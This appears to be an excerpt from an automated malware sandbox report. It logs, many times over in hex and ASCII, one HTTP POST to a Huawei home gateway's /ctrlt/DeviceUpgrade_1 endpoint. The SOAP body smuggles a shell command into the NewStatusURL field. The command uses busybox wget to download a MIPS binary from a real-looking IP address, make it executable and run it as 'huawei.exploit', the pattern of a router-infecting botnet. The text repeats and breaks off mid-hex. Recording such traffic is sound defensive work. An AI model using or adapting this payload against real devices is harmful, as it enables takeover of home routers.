68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 